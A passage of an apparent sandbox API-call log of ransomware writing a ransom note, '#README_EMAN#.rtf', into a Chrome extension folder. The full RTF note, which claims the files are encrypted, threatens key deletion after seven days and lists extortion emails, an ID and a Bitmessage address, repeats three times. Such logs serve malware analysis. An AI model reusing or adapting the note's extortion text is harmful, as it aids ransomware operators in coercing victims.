th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.578] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.579] CloseHandle (hObject=0x2f0) returned 1 [0286.579] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0286.579] GetLastError () returned 0x2 [0286.579] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 